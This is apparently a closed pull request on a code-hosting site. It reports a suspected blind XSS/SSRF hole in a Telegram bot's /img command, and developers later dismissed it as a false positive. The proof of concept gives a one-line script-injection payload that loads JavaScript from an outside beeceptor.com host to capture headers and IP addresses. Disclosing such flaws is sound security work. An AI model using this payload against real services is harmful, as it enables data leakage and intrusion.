Fix input handling for security purpose. #2
Loading…
Reference in New Issue
No description provided.
Delete Branch "%!s(<nil>)"
Deleting a branch is permanent. Although the deleted branch may continue to exist for a short time before it actually gets removed, it CANNOT be undone in most cases. Continue?
Due to poor input sanitization, the call /img into bot is vulnerable to Blind XSS/SSRF
Vulnerable code:
qValue is inserted without sanitization into the HTML content, making it vulnerable to XSS/Blind XSS.
Poc part 1:
/img "><script type="text/javascript" src="https://asdafasdas.free.beeceptor.com/first.js"></script><"
Poc part 2:
Screen 1, request to first.js
Screen 2, Headers leaked and also IP address could be leaked.
Poc part 3 - theoretically:
Since it's possible to abuse the function to inject Javscript/HTML, an attacker could do SSRF and use the bot as proxy or even read local files and send content to external host.
Poc part 4 - IP Leak thanks to SSRF throught Javascript Injection.
è la preview di telegram cretina
Closing as false positive after some discussion with developers.